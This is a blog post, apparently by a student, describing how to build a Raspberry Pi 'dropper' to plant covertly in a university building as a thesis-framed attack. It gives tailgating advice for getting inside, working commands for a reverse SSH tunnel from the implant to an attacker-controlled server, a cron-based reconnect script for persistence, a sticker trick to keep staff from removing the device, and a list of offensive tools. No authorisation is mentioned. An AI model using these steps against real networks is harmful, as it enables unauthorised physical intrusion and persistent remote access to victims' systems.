Building a Raspberry Pi dropper

The problem

For my bachelor's thesis, I will demostrate a possible cyber attack against my university.
I've spent a few weeks triyng to elaborate the hypothetical attack plan, that involves the mapping of the very complicated internet-exposed surface of my University and building a sofisticated phishing campaign.
But, wait a moment, do I really need to do all of this complicated (but cool anyway) stuff?

Every time I have a meeting with a professor, I have to go to their offices near my classroom.
Every time I go to a meeting, I always see a student that is downloading a Game of Thrones episode inside that building, because dude, the internet connection down there is freaking awesome.

An easy way into my professors network, seems too good to be true.
I'have outlined a few problems that I need to resolve in order to make everything work:

  1. The building is actually locked, meaning that someone on the inside must let you in.
  2. I have to be as stealth as possible, even if this is a simulated test showing up with my fancy laptop with Kali Linux fired up wuoldn't be optimal
  3. The implant should be permanent, or at least to persiste as much as possible. This means that the cleaning personnel should not remove my dropper.

The solution

Actually, those problems are quite easy to assess:

  1. For getting inside the building, I only have to wait on the door until someone enters, that wouldn't be the first time that someone asks me if I wanna come inside. Some times I don't deserve the people's kindness, but someone has to do it.
  2. Being stealth? That's what this post is about! The idea is to build a dropper with my Raspberry Pi 3 that would pass any quick-sight test.
  3. Persistence? I'll just attach a post-it with the warining "DO NOT REMOVE" and I'll be fine ;)

The setup

The idea on the paper looks great, but now I have to setup everything:

  1. The raspberry should be always available, and provide me a remote shell.
    I'll use a reverse SSH tunnel into my VPS hosted on AWS.
  2. Working with just a SSH terminal shouldn't be a pain, I'll throw tmux on it to make my life easier
  3. I'll need the tools to carry on a full test.

The Raspberry

I'm using a raspberry pi model 3, costed about 30€
I installed Kali on it, you can do the same following the procedure described here installing Kali on Raspberry
After flashing the image into the SD, I powered on my baby and logged in via SSH:

Schermata-del-2018-04-02-19-30-44

SSH Connectivity

I'll ensablish a reverse SSH tunnel from the Raspberry to my VPS (the setup of the VPS is not relevant, I just need a SSH server on it)
For testing purposes, I'll use vagrant to create a box that will act as my VPS, in production I'll use a real one.
The vagrantfile is shown below, stupid-simple:

Vagrant.configure("2") do |config|
  config.vm.box = "ubuntu/xenial64"
  config.vm.network "public_network"

  config.vm.provision "shell", inline: <<-SHELL
     apt-get update
     apt-get install ssh
   SHELL
end

The SSH Tunnel will act as follow:

  • The Raspberry ensablish a SSH connection to my server
  • The Raspberry requests a remote tunnel, that links a high port on the server (accessible only from localhost) to the local SSH port of the raspberry
  • In order to access the raspberry console, I just have to connect to the port opened with the tunnel

This is the full command:

ssh -l root -R 4444:127.0.0.1:22 192.168.0.30

After typing the root password, you'll get the reverse tunnel.
There are a few problems with this approach:

  1. You have to put your cleartext password using ssh-pass or something like that.
  2. You are giving ROOT ACCESS to every one that is able to log into the raspberry!? Think about an analyst that finds your device, and voilà, root access to your VPS. Not cool.

We can easly resolve those problems implementing key-based authentication and logging using a low-privileged user.
In order to create a low-privilege user on my ubuntu VM:

useradd intruder -s /bin/bash

and for creating the keys for the authentication:

root@kali:~# ssh-keygen -t rsa -b 2048
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:MeSGiIrdbuZTE8s3ilkNZXTj5uMOTYlnK6zz0wQvGms root@kali
root@kali:~# ls -l .ssh/
totale 12
-rw------- 1 root root 1679 apr  2 18:27 id_rsa
-rw-r--r-- 1 root root  391 apr  2 18:27 id_rsa.pub
-rw-r--r-- 1 root root  222 apr  2 17:50 known_hosts
root@kali:~# 

I took the previously generated public key, and copied into the authorized_keys file inside the /home/intruder/.ssh dir
Now I can SSH into the ubuntu machine without typing the password:

Schermata-del-2018-04-02-20-34-24

The final command to create a reverse SSH tunnel:

ssh intruder@192.168.0.30 -R 4444:127.0.0.1:22 -N -f

It's easy to verify if the previous command was successful or not, inside the Ubuntu VM it's possible to see that port 4444 is open and listening:

intruder@ubuntu-xenial:~$ netstat -tulpn | grep 4444
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:4444          0.0.0.0:*               LISTEN      -               
tcp6       0      0 ::1:4444                :::*                    LISTEN      -               

Let's try to ssh using that port:

Schermata-del-2018-04-02-20-39-52

Here we go! We have full access to the raspberry SSH console!
The next challenge is to make this script persistent, meaning that it should be robust enough to resist reboots, network changes and so on.
A simple bash script will do the job:

#!/bin/bash

tmp=$(ps aux | grep -c 4444)

if [[ $tmp -lt 2 ]]; then
 ssh intruder@192.168.0.30 -R 4444:127.0.0.1:22 -N -f
fi

This script must be embedded into a cron job, in order to call it every minute (or so)

crontab -e
*/1 * * * * /bin/bash /root/ssh_reconnect.sh

Now it's possible to disconnect and reconnect the raspberry, but after a minute, a shell appears!

The tools

I don't need a lot of fancy tools in order to carry on the test, but there are a few of them that I find very handy to have:

  • nmap, obviously.
  • crackmapexec v4, a must for pentesting windows network
  • Metasploit, because why not?
  • Empire, for where Metasploit is not stealthy enough
  • Responder, to bring terror to Windows networks
  • bettercap, because a MIMT framework always comes handy sooner or later

I'm not going to cover the installation of those tools since is out of this post's aim.

Maybe in the future I'll add more connectivity modules as VPN and a wifi AP.

Until then, Happy hacking!